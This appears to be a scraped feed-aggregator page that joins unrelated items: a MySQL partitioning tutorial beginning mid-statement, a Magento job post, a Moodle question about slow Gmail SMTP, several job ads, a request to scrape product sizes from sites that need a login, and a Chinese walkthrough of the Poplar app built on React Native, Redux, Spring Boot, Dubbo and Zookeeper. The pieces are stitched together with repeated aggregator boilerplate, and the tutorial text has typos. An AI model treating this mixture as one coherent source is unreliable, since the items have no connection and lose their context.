cust_fname VARCHAR(30), cust_lname VARCHAR(30), st_dt DATE NOT NULL DEFAULT '1970-01-01', end_dt DATE NOT NULL DEFAULT '9999-12-31', contract_code INT NOT NULL, contract_id INT NOT NULL ) PARTITION BY RANGE (contract_id) ( PARTITION p0 VALUES LESS THAN (50), PARTITION p1 VALUES LESS THAN (100), PARTITION p2 VALUES LESS THAN (150), PARTITION p3 VALUES LESS THAN (200) ); For example, let us suppose that you wish to partition based on the year contract ended: CREATE TABLE customer_contract( cust_id INT NOT NULL, cust_fname VARCHAR(30), cust_lname VARCHAR(30), st_dt DATE NOT NULL DEFAULT '1970-01-01', end_dt DATE NOT NULL DEFAULT '9999-12-31', contract_code INT NOT NULL, contract_id INT NOT NULL ) PARTITION BY RANGE (year(end_dt)) ( PARTITION p0 VALUES LESS THAN (2001), PARTITION p1 VALUES LESS THAN (2002), PARTITION p2 VALUES LESS THAN (2003), PARTITION p3 VALUES LESS THAN (2004) ); It is also possible to partition a table by RANGE, based on the value of a TIMESTAMP column, using the UNIX_TIMESTAMP() function, as shown in this example: CREATE TABLE sales_forecast ( sales_forecast_id INT NOT NULL, sales_forecast_status VARCHAR(20) NOT NULL, sales_forecast_updated TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP ) PARTITION BY RANGE ( UNIX_TIMESTAMP(sales_forecast_updated) ) ( PARTITION p0 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-01-01 00:00:00') ), PARTITION p1 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-04-01 00:00:00') ), PARTITION p2 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-07-01 00:00:00') ), PARTITION p3 VALUES LESS THAN ( UNIX_TIMESTAMP('2008-10-01 00:00:00') ), PARTITION p4 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-01-01 00:00:00') ), PARTITION p5 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-04-01 00:00:00') ), PARTITION p6 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-07-01 00:00:00') ), PARTITION p7 VALUES LESS THAN ( UNIX_TIMESTAMP('2009-10-01 00:00:00') ), PARTITION p8 VALUES LESS THAN ( UNIX_TIMESTAMP('2010-01-01 00:00:00') ), PARTITION p9 VALUES LESS THAN (MAXVALUE) ); LIST partitioningThe difference between RANGE and LIST partitioning is: In LIST partitioning, each partition is grouped on the selected list of values of a specific column. You can do it by PARTITION BY LIST (EXPR) where EXPR is the selected column for list partition, We have explained LIST partitioning with example below: CREATE TABLE students ( student_id INT NOT NULL, student_fname VARCHAR(30), student_lname VARCHAR(30), student_joined DATE NOT NULL DEFAULT '1970-01-01', student_separated DATE NOT NULL DEFAULT '9999-12-31', student_house INT, student_grade_id INT ) PARTITION BY LIST(student_grade_id) ( PARTITION P1 VALUES IN (1,2,3,4), PARTITION P2 VALUES IN (5,6,7), PARTITION P3 VALUES IN (8,9,10), PARTITION P4 VALUES IN (11,12) ); HASH partitioningHASH partitioning makes an even distribution of data among predetermined number of partitions, In RANGE and LIST partitioning you must explicitly define the partitioning logic and which partition given column value or set of column values are stored. In HASH partitioning MySQL take care of this, The following example explains HASH partitioning better: CREATE TABLE store ( store_id INT NOT NULL, store_name VARCHAR(30), store_location VARCHAR(30), store_started DATE NOT NULL DEFAULT '1997-01-01', store_code INT ) PARTITION BY HASH(store_id) PARTITIONS 4; P.S. : If you do not include a PARTITIONS clause, the number of partitions defaults to 1. LINEAR HASH partitioningThe LINEAR HASH partitioning utilizes a linear powers-of-two algorithm, Where HASH partitioning employs the modulus of the hashing function’s value. Please find below LINEAR HASH partitioning example: CREATE TABLE store ( store_id INT NOT NULL, store_name VARCHAR(30), store_location VARCHAR(30), store_started DATE NOT NULL DEFAULT '1997-01-01', store_code INT ) PARTITION BY LINEAR HASH( YEAR(store_started) ) PARTITIONS 4; KEY partitioningKEY partitioning is very much similar to HASH, the only difference is, the tasing function for the KEY partitioning is supplied by MySQL, In case of MySQL NDB Cluster, MD5() is used, For tables using other storage engines, the MySQL server uses the storage engine specific hashing function which os based on the same algorithm as PASSWORD(). CREATE TABLE contact( id INT NOT NULL, name VARCHAR(20), contact_number INT, email VARCHAR(50), UNIQUE KEY (id) ) PARTITION BY KEY() PARTITIONS 5; P.S. – if the unique key column were not defined as NOT NULL, then the previous statement would fail. SubpartitioningSUBPARTITIONING  is also known as composite partitioning, You can partition table combining RANGE and HASH for better results, The example below explains SUBPARTITIONING better: CREATE TABLE purchase (id INT, item VARCHAR(30), purchase_date DATE) PARTITION BY RANGE( YEAR(purchase_date) ) SUBPARTITION BY HASH( TO_DAYS(purchase_date) ) SUBPARTITIONS 2 ( PARTITION p0 VALUES LESS THAN (2000), PARTITION p1 VALUES LESS THAN (2010), PARTITION p2 VALUES LESS THAN MAXVALUE ); It is also possible to define subpartitions explicitly using SUBPARTITION clauses to specify options for individual subpartitions: CREATE TABLE purchase (id INT, item VARCHAR(30), purchase_date DATE) PARTITION BY RANGE( YEAR(purchase_date) ) SUBPARTITION BY HASH( TO_DAYS(purchase_date) ) ( PARTITION p0 VALUES LESS THAN (2000) ( SUBPARTITION s0, SUBPARTITION s1 ), PARTITION p1 VALUES LESS THAN (2010) ( SUBPARTITION s2, SUBPARTITION s3 ), PARTITION p2 VALUES LESS THAN MAXVALUE ( SUBPARTITION s4, SUBPARTITION s5 ) ); Things to remember: Each partition must have the same number of subpartitions. Each SUBPARTITION clause must include (at a minimum) a name for the subpartition. Otherwise, you may set any desired option for the subpartition or allow it to assume its default setting for that option. Subpartition names must be unique across the entire table. For example, the following CREATE TABLE statement is valid in MySQL 5.7: CREATE TABLE purchase (id INT, item VARCHAR(30), purchase_date DATE) PARTITION BY RANGE( YEAR(purchase_date) ) SUBPARTITION BY HASH( TO_DAYS(purchase_date) ) ( PARTITION p0 VALUES LESS THAN (1990) ( SUBPARTITION s0, SUBPARTITION s1 ), PARTITION p1 VALUES LESS THAN (2000) ( SUBPARTITION s2, SUBPARTITION s3 ), PARTITION p2 VALUES LESS THAN MAXVALUE ( SUBPARTITION s4, SUBPARTITION s5 ) ); MySQL partitioning limitationsMySQL partitioning also has limitations, We are listing down below the limitations of MySQL partitioning: A PRIMARY KEY must include all columns in the table’s partitioning function: CREATE TABLE tab3 ( column1 INT NOT NULL, column2 DATE NOT NULL, column3 INT NOT NULL, column4 INT NOT NULL, UNIQUE KEY (column1, column2), UNIQUE KEY (column3) ) PARTITION BY HASH(column1 + column3) PARTITIONS 4; Expect this error after running above script – ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table’s partitioning function The right way of doing it: CREATE TABLE table12 ( column1 INT NOT NULL, column2 DATE NOT NULL, column3 INT NOT NULL, column4 INT NOT NULL, UNIQUE KEY (column1, column2, column3) ) PARTITION BY HASH(column3) PARTITIONS 5; CREATE TABLE table25 ( column11 INT NOT NULL, column12 DATE NOT NULL, column13 INT NOT NULL, column14 INT NOT NULL, UNIQUE KEY (column11, column13) ) PARTITION BY HASH(column11 + column13) PARTITIONS 5; Most popular limitation of MySQL – Primary key is by definition a unique key, this restriction also includes the table’s primary key, if it has one. The example below explains this limitation better: CREATE TABLE table55 ( column11 INT NOT NULL, column12 DATE NOT NULL, column13 INT NOT NULL, column14 INT NOT NULL, PRIMARY KEY(column11, column12) ) PARTITION BY HASH(column13) PARTITIONS 4; CREATE TABLE table65 ( column20 INT NOT NULL, column25 DATE NOT NULL, column30 INT NOT NULL, column35 INT NOT NULL, PRIMARY KEY(column20, column30), UNIQUE KEY(column25) ) PARTITION BY HASH( YEAR(column25) ) PARTITIONS 5; Both of the above scripts will return this error – ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table’s partitioning function The right way of doing it: CREATE TABLE t45 ( column50 INT NOT NULL, column55 DATE NOT NULL, column60 INT NOT NULL, column65 INT NOT NULL, PRIMARY KEY(column50, column55) ) PARTITION BY HASH(column50 + YEAR(column55)) PARTITIONS 5; CREATE TABLE table88 ( column80 INT NOT NULL, column81 DATE NOT NULL, column82 INT NOT NULL, column83 INT NOT NULL, PRIMARY KEY(column80, column81, column82), UNIQUE KEY(column81, column82) ); In above example, the primary key does not include all columns referenced in the partitioning expression. However, both of the statements are valid ! You can still successfully partition a MySQL table without unique keys – this also includes having no primary key and you may use any column or columns in the partitioning expression as long as the column type is compatible with the partitioning type, The example below shows partitioning a table with no unique / primary keys: CREATE TABLE table_has_no_pk (column10 INT, column11 INT, column12 varchar(20)) PARTITION BY RANGE(column10) ( PARTITION p0 VALUES LESS THAN (500), PARTITION p1 VALUES LESS THAN (600), PARTITION p2 VALUES LESS THAN (700), PARTITION p3 VALUES LESS THAN (800) ); You cannot later add a unique key to a partitioned table unless the key includes all columns used by the table’s partitioning expression, The example below explains this much better: ALTER TABLE table_has_no_pk ADD PRIMARY KEY(column10); ALTER TABLE table_has_no_pk drop primary key; ALTER TABLE table_has_no_pk ADD PRIMARY KEY(column10,column11); ALTER TABLE table_has_no_pk drop primary key; However, the next statement fails, because column10 is part of the partitioning key, but is not part of the proposed primary key: mysql> ALTER TABLE table_has_no_pk ADD PRIMARY KEY(column11); ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table's partitioning function mysql> MySQL partitioning limitations (at storage engine level) InnoDB InnoDB foreign keys and MySQL partitioning are not compatible, Partitioned InnoDB tables cannot have foreign key references, nor can they have columns referenced by foreign keys, So you cannot partition InnoDB tables which have or referenced by foreign keys. InnoDB does not support use of multiple disks for subpartition (MyISAM supports this feature) Use ALTER TABLE … REBUILD PARTITION and ALTER TABLE … ANALYZE PARTITION than using ALTER TABLE … OPTIMIZE PARTITION NDB storage engine  We can only partition by KEY (including LINEAR KEY) in NDB storage engine. FEDERATED storage engine  Partitioning not supported in FEDERATED storage engine. CSV storage engine Partitioning not supported in CSV storage engine. MERGE storage engine  Tables using the MERGE storage engine cannot be partitioned. Partitioned tables cannot be merged. MySQL functions shown in the following list are allowed in partitioning expressions: ABS() CEILING() DATEDIFF() DAY() DAYOFMONTH() DAYOFWEEK() DAYOFYEAR() EXTRACT() FLOOR() HOUR() MICROSECOND() MINUTE() MOD() MONTH() QUARTER() SECOND() TIME_TO_SEC() TO_DAYS() TO_SECONDS() UNIX_TIMESTAMP() WEEKDAY() YEAR() YEARWEEK() MySQL partitioning and locks  Effect on DML statements In MySQL 5.7, updating a partitioned MyISAM table cause only the affected partitioned to be locked. SELECT statements (including those containing unions or joins) lock only those partitions that actually need to be read. This also applies to SELECT …PARTITION. An UPDATE prunes locks only for tables on which no partitioning columns are updated. REPLACE and INSERT lock only those partitions having rows to be inserted or replaced. However, if an AUTO_INCREMENT value is generated for any partitioning column then all partitions are locked. INSERT … ON DUPLICATE KEY UPDATE is pruned as long as no partitioning column is updated. INSERT … SELECT locks only those partitions in the source table that need to be read, although all partitions in the target table are locked. Locks imposed by LOAD DATA statements on partitioned tables cannot be pruned. Effect on DML statements CREATE VIEW does not cause any locks. ALTER TABLE … EXCHANGE PARTITION prunes locks; only the exchanged table and the exchanged partition are locked. ALTER TABLE … TRUNCATE PARTITION prunes locks; only the partitions to be emptied are locked. In addition, ALTER TABLE statements take metadata locks on the table level. Effect on other statements LOCK TABLES cannot prune partition locks. CALL stored_procedure(expr) supports lock pruning, but evaluating expr does not. DO and SET statements do not support partitioning lock pruning.   The post What is MySQL partitioning ? appeared first on MySQL Consulting, Support and Remote DBA Services.
          Fix image upload issue in Magento 1.9.3.8      Cache   Translate Page   Web Page Cache   
We recently migrated to Magento 1.9.3.8 from 1.7. All functionality seems to be there except for product image uploading. We are looking for a developer very experienced with Magento to resolve this issue. (Budget: $30 - $250 USD, Jobs: HTML, Javascript, Magento, MySQL, PHP)
          SMTP Gmail delay while sending emails      Cache   Translate Page   Web Page Cache   
by Vytautas Krasauskas.  

Hello,

Moodle version 3.5.1

Ubuntu 18.04 digitalocean droplet

standard apache/mysql/php install from the repos

this is a restored setup from a different host. Email has never been configured before, cannot check if it worked.

cronjob is running

smtp host: smtp.gmail.com:587 (same behaviour as without the port being specified)

smtp security: tls

smtp auth type: any, they all behave the same

username: appropriate username

password: app specific password

smtp limit: 1

captcha thing done


At first I was testing using the forgotten password function, but later installed the mail test plugin. Behaviour is the same - email gets delivered, but it takes about 2.5 - 3 minutes for it to arrive. In the mean time, the page keeps loading. Clicking any other internal link does not work, the page just keeps loading until the email eventually gets sent. Same behaviour with new user registration. This makes me want to tear my hair out.

Any suggestions?

Sincerely yours.


          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Change table design & function      Cache   Translate Page   Web Page Cache   
Change table design & function i want to make like attach file. currently : https://collab.id/project/Membuat-aplikasi-handphoneamskj login with google/facebook. (Budget: $2 - $8 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Scraping the Website      Cache   Translate Page   Web Page Cache   
need to develop a program in which i would like to scrap data from various websites that has a user name and password, data will be search by size parameter and would like to scrap the sizes of the product... (Budget: $30 - $250 USD, Jobs: Data Mining, MySQL, PHP, Software Architecture, Web Scraping)
          Telecommute Java8 Developer in Atlanta      Cache   Translate Page   Web Page Cache   
A staffing agency is searching for a person to fill their position for a Telecommute Java8 Developer in Atlanta. Individual must be able to fulfill the following responsibilities: Work with a talented team of technologists Use the latest technology, tools, and methodologies Perform tons of new development and update architecture Skills and Requirements Include: Expert level development experience with Java 8 (or later) Solid experience with Spring/Spring Boot and all company-required technologies Experience with API development and Web Services- REST / HATEOS Experience with Docker, Maven, or similar tools Experience with Relational Databases- SQL, MySQL, etc. 7+ years of Java development experience
          Change table design & function      Cache   Translate Page   Web Page Cache   
Change table design & function i want to make like attach file. currently : https://collab.id/project/Membuat-aplikasi-handphoneamskj login with google/facebook. (Budget: $2 - $8 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Scraping the Website      Cache   Translate Page   Web Page Cache   
need to develop a program in which i would like to scrap data from various websites that has a user name and password, data will be search by size parameter and would like to scrap the sizes of the product... (Budget: $30 - $250 USD, Jobs: Data Mining, MySQL, PHP, Software Architecture, Web Scraping)
          从 React Native 到微服务,落地一个全栈解决方案      Cache   Translate Page   Web Page Cache   

framework

Poplar是一个社交主题的内容社区,但自身并不做社区,旨在提供可快速二次开发的开源基础套件。前端基于React Native与Redux构建,后端由Spring Boot、Dubbo、Zookeeper组成微服务对外提供一致的API访问。

https://github.com/lvwangbeta/Poplar

framework

React Native虽然提供跨平台解决方案,但并未在性能与开发效率上做出过度妥协,尤其是对于有JS与CSS基础的开发人员入手不会很难,不过JSX语法糖需要一定的适应时间,至于DOM结构与样式和JS处理写在一起是否喜欢就见仁见智了,可这也是一个强迫你去模块化解耦的比较好的方式。由于React组件的数据流是单向的,因此会引入一个很麻烦的问题,组件之间很难高效通信,尤其是两个层级很深的兄弟节点之间通信变得异常复杂,对上游所有父节点造成传递污染,维护成本极高。为此Poplar引入了Redux架构,统一管理应用状态。

模块化

framework

APP由5个基础页面构成,分别是Feed信息流主页(MainPage)、探索发现页面(ExplorePage)、我的账户详情页(MinePage)、状态创建于发送页(NewFeed)、登录注册页面(LoginRegPage)等。页面又由基础组件组成,如Feed列表、Feed详情、评论、标签、相册等等。如果与服务器交互,则统一交由API层处理。

framework

页面底部由TabNavigator包含5个TabNavigator.Item构成,分别对应基础页面,如果用户未登录,则在点击主页或新增Tab时呼出登录注册页面。

Redux

引入Redux并不是赶潮流,而且早在2014年就已经提出了Flux的概念。使用Redux主要是不得不用了,Poplar组件结构并非特别复杂,但嵌套关系较多,而且需要同时支持登录与非登录情况的信息流访问,这就需要一个统一的状态管理器来协调组件之间的通信和状态更新,而Redux很好的解决了这个问题。

这里不枯燥的讲解Redux的架构模型了,而是以Poplar中的登录状态为例来简单说下Redux在Poplar项目中是如何使用的。

Poplar使用React-Redux库,一个将Redux架构在React的实现。

1. 场景描述

在未登录情况下,如果用户点击Feed流页面会弹出登录/注册页面,登录或注册成功之后页面收回,同时刷新出信息流内容。下图中的App组件是登录页面和信息流主页兄弟节点的共同父组件。

framework

这个需求看似简单,但如果没有Redux,在React中实现起来会很蹩脚而且会冗余很多无用代码调用。

首先我们看下在没有Redux的情况下是如何实现这一业务流程的?

在点击Tabbar的第一个Item也就是信息流页签时,要做用户是否登录检查,这个检查可以通过查看应用是否本地化存储了token或其他验签方式验证,如果未登录,需要主动更新App组件的state状态,同时将这个状态修改通过props的方式传递给LoginPage,LoginPage得知有新的props传入后更新自己的state:{visible:true}来呼出自己,如果客户输入登录信息并且登录成功,则需要将LoginPage的state设置为{visible:false}来隐藏自己,同时回调App传给它的回调函数来告诉父附件用户已经登录成功,我们算一下这仅仅是两个组件之间的通信就要消耗1个props变量1个props回调函数和2个state更新,到这里只是完成了LoginPage通知App组件目前应用应该处于已登录状态,但是还没有刷新出用户的Feed流,因为此时MainPage还不知道用户已登录,需要App父组件来告知它已登录请刷新,可怎样通知呢?React是数据流单向的,要想让下层组件更新只能传递变化的props属性,这样就又多了一个props属性的开销,MainPage更新关联的state同时刷新自己获取Feed流,这才最终完成了一次登录后的MainPage信息展示。通过上面的分析可以看出Poplar在由未登录到登录的状态转变时冗余了很多但是又没法避免的参数传递,因为兄弟节点LoginPage与MainPage之间无法简单的完成通信告知彼此的状态,就需要App父组件这个桥梁来先向上再向下的传递消息。

再来看下引入Redux之后是如何完成这一同样的过程的:

还是在未登录情况下点击主页,此时Poplar由于Redux的引入已经为应用初始了全局登录状态{status: 'NOT_LOGGED_IN'},当用户登录成功之后会将该状态更新为{status: 'LOGGED_IN'},同时LoginPage与此状态进行了绑定,Redux会第一时间通知其更新组件自己的状态为{visible:false}。与此同时App也绑定了这个由Redux管理的全局状态,因此也同样可以获得{status: 'LOGGED_IN'}的通知,这样就可以很简单的在客户登录之后隐藏LoginPage显示MainPage,是不是很简单也很神奇,完全不用依赖参数的层层传递,组件想要获得哪个全局状态就与其关联就好,Redux会第一时间通知你。

2. 实现

以实际的代码为例来讲解下次场景的React-Redux实现:

connect

在App组件中,通过connect方法将UI组件生成Redux容器组件,可以理解为架起了UI组件与Redux沟通的桥梁,将store于组件关联在一起。

import {showLoginPage, isLogin} from  './actions/loginAction';
import {showNewFeedPage} from './actions/NewFeedAction';

export default connect((state) => ({
  status: state.isLogin.status, //登录状态
  loginPageVisible: state.showLoginPage.loginPageVisible
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: () => dispatch(showLoginPage()),
  showNewFeedPage: () => dispatch(showNewFeedPage()),
}))(App)

connect方法的第一个参数是mapStateToProps函数,建立一个store中的数据到UI组件props对象的映射关系,只要store更新了就会调用mapStateToProps方法,mapStateToProps返回一个对象,是一个UI组件props与store数据的映射。上面代码中,mapStateToProps接收state作为参数,返回一个UI组件登陆状态与store中state的登陆状态的映射关系以及一个登陆页面是否显示的映射关系。这样App组件状态就与Redux的store关联上了。

第二个参数mapDispatchToProps函数允许将action作为props绑定到组件上,返回一个UI组件props与Redux action的映射关系,上面代码中App组件的isLoginshowLoginPageshowNewFeedPageprops与Redux的action建立了映射关系。调用isLogin实际调用的是Redux中的store.dispatch(isLogin)action,dispatch完成对action到reducer的分发。

Provider

connect中的state是如何传递进去的呢?React-Redux 提供Provider组件,可以让容器组件拿到state

import React, { Component } from 'react';
import { Provider } from 'react-redux';
import configureStore from './src/store/index';

const store = configureStore();

export default class Root extends Component {
  render() {
    return (
      <Provider store={store}>
        <Main />
      </Provider>
    )
  }
}

上面代码中,Provider在根组件外面包了一层,这样一来,App的所有子组件就默认都可以拿到state了。

Action & Reducer

组件与Redux全局状态的关联已经搞定了,可如何实现状态的流转呢?登录状态是如何扩散到整个应用的呢?

这里就需要Redux中的Action和Reducer了,Action负责接收UI组件的事件,Reducer负责响应Action,返回新的store,触发与store关联的UI组件更新。

export default connect((state) => ({
  loginPageVisible: state.showLoginPage.loginPageVisible,
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: (flag) => dispatch(showLoginPage(flag)),
  showRegPage: (flag) => dispatch(showRegPage(flag)),
}))(LoginPage)

this.props.showLoginPage(false);
this.props.isLogin();

在这个登录场景中,如上代码,LoginPage将自己的props与store和action绑定,如果登录成功,调用showLoginPage(false)action来隐藏自身,Reducer收到这个dispatch过来的action更新store状态:

//Action
export function showLoginPage(flag=true) {
  if(flag == true) {
    return {
      type: 'LOGIN_PAGE_VISIBLE'
    }
  } else {
    return {
      type: 'LOGIN_PAGE_INVISIBLE'
    }
  }
}

//Reducer
export function showLoginPage(state=pageState, action) {
  switch (action.type) {
    case 'LOGIN_PAGE_VISIBLE':
      return {
        ...state,
        loginPageVisible: true,
      }
      break;
    case 'LOGIN_PAGE_INVISIBLE':
      return {
        ...state,
        loginPageVisible: false,
      }
      break;
    default:
      return state;
  }
}

同时调用isLogin这个action更新应用的全局状态为已登录:

//Action
export function isLogin() {
  return dispatch => {
      Secret.isLogin((result, token) => {
        if(result) {
          dispatch({
            type: 'LOGGED_IN',
          });
        } else {
          dispatch({
            type: 'NOT_LOGGED_IN',
          });
        }
      });
  }
}

//Reducer
export function isLogin(state=loginStatus, action) {
    switch (action.type) {
      case 'LOGGED_IN':
        return {
          ...state,
          status: 'LOGGED_IN',
        }
        break;
      case 'NOT_LOGGED_IN':
        return {
          ...state,
          status: 'NOT_LOGGED_IN',
        }
        break;
      default:
        return state;
    }
}

App组件由于已经关联了这个全局的登录状态,在reducer更新了此状态之后,App也会收到该更新,进而重新渲染自己,此时MainPage就会渲染出来了:

const {status} = this.props;
return (
  <TabNavigator>
    <TabNavigator.Item
      selected={this.state.selectedTab === 'mainTab'}
      renderIcon={() => <Image style={styles.icon} 
                         source={require('./imgs/icons/home.png')} />}
      renderSelectedIcon={() => <Image style={styles.icon} 
                          source={require('./imgs/icons/home_selected.png')} />}
      onPress={() => {
                      this.setState({ selectedTab: 'mainTab' });
                      if(status == 'NOT_LOGGED_IN') {
                        showLoginPage();
                      }
                  }
               }
    >
	  //全局状态已由NOT_LOGGED_IN变为LOGGED_IN
      {status == 'NOT_LOGGED_IN'?<LoginPage {...this.props}/>:<MainPage {...this.props}/>}

framework

项目构建 & 开发

1. 项目结构

project

poplar作为一个整体Maven项目,顶层不具备业务功能也不包含代码,对下层提供基础的pom依赖导入
poplar-api有着两重身份:API网关接收渠道层请求路由转发、作为微服务消费者组织提供者服务调用完成服务串联
poplar-user-service: 微服务提供者,提供注册、登录、用户管理等服务
poplar-feed-service: 微服务提供者,提供feed创建、生成信息流等服务
poplar-notice-service: 微服务提供者, 提供通知消息服务

每个子项目以Module方式单独创建 module

2. Maven聚合项目

Poplar由多个服务提供者、消费者和公共组件构成,他们之间的依赖关系既有关联关系又有父子从属关系, 为了简化配置也便于统一构建,需要建立合理的依赖。服务的提供者主要是Spring Boot项目,兼有数据库访问等依赖;服务的消费者同样是是Spring Boot项目,但由于是API层,需要对外提供接口,所以需要支持Controller; 服务消费者、提供者通过Dubbo完成调用,这也需要共用的Dubbo组件,所以我们可以发现消费者、提供者共同依赖Spring Boot以及Dubbo,抽离出一个parent的pom即可,定义公共的父组件:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>pom</packaging>

<name>poplar</name>
<description>Poplar</description>
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-data-redis</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-jdbc</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>    
    ...
</dependencies>

Poplar父组件除了引入公共的构建包之外,还需要声明其包含的子组件,这样做的原因是在Poplar顶层构建的时候Maven可以在反应堆计算出各模块之间的依赖关系和构建顺序。我们引入服务提供者和消费者:

 <modules>
    <module>poplar-common</module>
    <module>poplar-api</module>
    <module>poplar-feed-service</module>
    <module>poplar-user-service</module>
</modules>

子组件的pom结构就变的简单许多了,指定parent即可,pom源为父组件的相对路径

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-api</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>war</packaging>

<name>poplar-api</name>
<description>poplar api</description>

<parent>
    <groupId>com.lvwangbeta</groupId>
    <artifactId>poplar</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <relativePath>../pom.xml</relativePath> <!-- lookup parent from repository -->
</parent>   

还有一个公共构建包我们并没有说,它主要包含了消费者、提供者共用的接口、model、Utils方法等,不需要依赖Spring也没有数据库访问的需求,这是一个被其他项目引用的公共组件,我们把它声明为一个package方式为jar的本地包即可,不需要依赖parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-common</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>

在项目整体打包的时候,Maven会计算出其他子项目依赖了这个本地jar包就会优先将其打入本地Maven库。 在Poplar项目根目录执行mvn clean install查看构建顺序,可以看到各子项目并不是按照我们在Poplar-pom中定义的那样顺序执行的,而是Maven反应堆计算各模块的先后依赖来执行构建,先构建公共依赖common包然后构建poplar,最后构建各消费者、提供者。

[INFO] Reactor Summary:
[INFO]
[INFO] poplar-common ...................................... SUCCESS [ 3.341 s]
[INFO] poplar ............................................. SUCCESS [ 3.034 s]
[INFO] poplar-api ......................................... SUCCESS [ 25.028 s]
[INFO] poplar-feed-service ................................ SUCCESS [ 6.451 s]
[INFO] poplar-user-service ................................ SUCCESS [ 8.056 s]
[INFO] ------------------------------------------------------------------

如果我们只修改了某几个子项目,并不需要全量构建,只需要用Maven的-pl选项指定项目同时-am构建其依赖的模块即可,我们尝试单独构建poplar-api这个项目,其依赖于poplar-common和poplar:

mvn clean install -pl poplar-api -am  

执行构建发现Maven将poplar-api依赖的poplar-common和poplar优先构建之后再构建自己:

[INFO] Reactor Summary:
[INFO] [INFO] poplar-common ...................................... SUCCESS [ 2.536 s]
[INFO] poplar ............................................. SUCCESS [ 1.756 s]
[INFO] poplar-api ......................................... SUCCESS [ 28.101 s]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS

3. Dubbo & Zookeeper

上面所述的服务提供者和消费者依托于Dubbo实现远程调用,但还需要一个注册中心,来完成服务提供者的注册、通知服务消费者的任务,Zookeeper就是一种注册中心的实现,poplar使用Zookeeper作为注册中心。

3.1 Zookeeper安装

下载解压Zookeeper文件

$ cd zookeeper-3.4.6  
$ mkdir data  

创建配置文件

$ vim conf/zoo.cfg

tickTime = 2000
dataDir = /path/to/zookeeper/data
clientPort = 2181
initLimit = 5
syncLimit = 2

启动

$ bin/zkServer.sh start

停止

$ bin/zkServer.sh stop 

3.2 Dubbo admin

Dubbo管理控制台安装

git clone https://github.com/apache/incubator-dubbo-ops
cd incubator-dubbo-ops && mvn package  

然后就可以在target目录下看到打包好的war包了,将其解压到tomcatwebapps/ROOT目录下(ROOT目录内容要提前清空),可以查看下解压后的dubbo.properties文件,指定了注册中心Zookeeper的IP和端口

dubbo.registry.address=zookeeper://127.0.0.1:2181
dubbo.admin.root.password=root
dubbo.admin.guest.password=guest

启动tomcat

./bin/startup.sh 	

访问

http://127.0.0.1:8080/   

这样Dubbo就完成了对注册中心的监控设置

dubbo-admin

4. 开发

微服务的提供者和消费者开发模式与以往的单体架构应用虽有不同,但逻辑关系大同小异,只是引入了注册中心需要消费者和提供者配合实现一次请求,这就必然需要在两者之间协商接口和模型,保证调用的可用。

文档以用户注册为例展示从渠道调用到服务提供者、消费者和公共模块发布的完整开发流程。

4.1 公共

poplar-common作为公共模块定义了消费者和提供者都依赖的接口和模型, 微服务发布时才可以被正常访问到
定义用户服务接口

public interface UserService {
    String register(String username, String email, String password);
}

4.2 服务提供者

UserServiceImpl实现了poplar-common中定义的UserService接口

@Service
public class UserServiceImpl implements UserService {

    @Autowired
    @Qualifier("userDao")
    private UserDAO userDao;

    public String register(String username, String email, String password){
        if(email == null || email.length() <= 0)
            return Property.ERROR_EMAIL_EMPTY;

        if(!ValidateEmail(email))
            return Property.ERROR_EMAIL_FORMAT;
        ...
    }

可以看到这就是单纯的Spring BootService写法,但是@Service注解一定要引入Dubbo包下的,才可以让Dubbo扫描到该Service完成向Zookeeper注册:

dubbo.scan.basePackages = com.lvwangbeta.poplar.user.service

dubbo.application.id=poplar-user-service
dubbo.application.name=poplar-user-service

dubbo.registry.address=zookeeper://127.0.0.1:2181

dubbo.protocol.id=dubbo
dubbo.protocol.name=dubbo
dubbo.protocol.port=9001

4.3 服务消费者

前面已经说过,poplar-api作为API网关的同时还是服务消费者,组织提供者调用关系,完成请求链路。

API层使用@Reference注解来向注册中心请求服务,通过定义在poplar-common模块中的UserService接口实现与服务提供者RPC通信

@RestController
@RequestMapping("/user")
public class UserController {

    @Reference
    private UserService userService;

    @ResponseBody
    @RequestMapping("/register")
    public Message register(String username, String email, String password) {
        Message message = new Message();
        String errno = userService.register(username, email, password);
        message.setErrno(errno);
        return message;
    }
} 

application.properties配置

dubbo.scan.basePackages = com.lvwangbeta.poplar.api.controller

dubbo.application.id=poplar-api
dubbo.application.name=poplar-api

dubbo.registry.address=zookeeper://127.0.0.1:2181 

5.服务Docker化

